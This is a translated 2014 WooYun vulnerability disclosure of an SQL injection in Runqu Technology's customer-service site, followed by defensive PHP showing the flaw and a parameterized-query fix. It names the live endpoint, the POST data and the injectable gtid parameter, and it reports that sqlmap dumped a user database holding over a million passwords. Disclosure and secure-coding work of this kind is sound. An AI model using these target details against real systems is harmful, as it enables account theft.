[Public vulnerability] 润趣科技 (Runqu Technology) SQL injection vulnerability (endangers a massive number of user accounts)

Source: WooYun    Views: 504    Date: 2014-06-23

润趣科技 SQL injection vulnerability (endangers a massive number of user accounts)
Vendor: 润趣科技
Author: bitcoin
Submitted: 2014-05-09 11:34
Published: 2014-06-23 11:34
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 20
Status: vendor could not be reached, or vendor actively ignored the report
Source: http://www.wooyun.org
Tags: php + numeric-type injection, MySQL injection techniques

Vulnerability details

Disclosure status:

2014-05-09: actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-06-23: the vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection vulnerability at 润趣科技, endangering the account security of over a million users.

Details:

The injection point is in the 润趣 customer service site; it is a POST injection.

Injection point:

http://kf.runich.com/index.php/Bug/getzones

POST data:

ajax=1&gtid=11

The gtid parameter is not filtered strictly, which leads to injection.

Bringing in sqlmap:

(screenshot 1.jpg: sqlmap output)



Database: uc

[332 tables]


(screenshots 3.jpg, 4.jpg)



Over a million user passwords!



(screenshots 8.jpg, 9.jpg)



Proof of vulnerability:

As above.

Fix recommendation:

Filter the input.
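The unfiltered numeric gtid parameter described in the details section, and the "filter the input" fix recommended above, made concrete as an added example (not code from 润趣科技 or from the report): a hypothetical PHP handler for the getzones action, first in the vulnerable form and then hardened. The table name zones, the column game_type_id and the $pdo connection are assumptions.

```php
<?php
// Added example, not the vendor's code. Assumes a PDO connection $pdo to MySQL
// and a table `zones` with a column `game_type_id` (both hypothetical).

// Vulnerable form: the numeric parameter is interpolated straight into the SQL
// string. Because the value sits in an unquoted numeric context, quote escaping
// (addslashes, magic quotes) does nothing; any non-digit input becomes SQL.
function getZonesVulnerable(PDO $pdo, array $post): array
{
    $gtid = $post['gtid'] ?? '';
    $sql  = "SELECT id, name FROM zones WHERE game_type_id = $gtid";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: validate the parameter as a positive integer and reject
// everything else, then bind it as a typed parameter in a prepared statement.
// Validation gives a clean 400 for garbage; the prepared statement keeps data
// and SQL separate even if validation were ever bypassed.
function getZonesSafe(PDO $pdo, array $post): array
{
    $gtid = filter_var($post['gtid'] ?? null, FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1]]);
    if ($gtid === false) {
        http_response_code(400);
        return [];   // do not echo the raw input back in the error body
    }
    $stmt = $pdo->prepare('SELECT id, name FROM zones WHERE game_type_id = :gtid');
    $stmt->bindValue(':gtid', $gtid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (placeholder DSN and credentials). ATTR_EMULATE_PREPARES => false makes
// MySQL receive a real server-side prepared statement rather than a string
// assembled client-side.
// $pdo = new PDO('mysql:host=127.0.0.1;dbname=DBNAME;charset=utf8mb4',
//                'DBUSER', 'DBPASS',
//                [PDO::ATTR_EMULATE_PREPARES => false,
//                 PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// header('Content-Type: application/json');
// echo json_encode(getZonesSafe($pdo, $_POST));
```

Rejecting non-integer gtid values at the edge also gives a simple detection signal: log the 400s for this endpoint and alert on a burst of them from one source.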

Copyright notice: when reposting, please credit the source: bitcoin@乌云

Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined.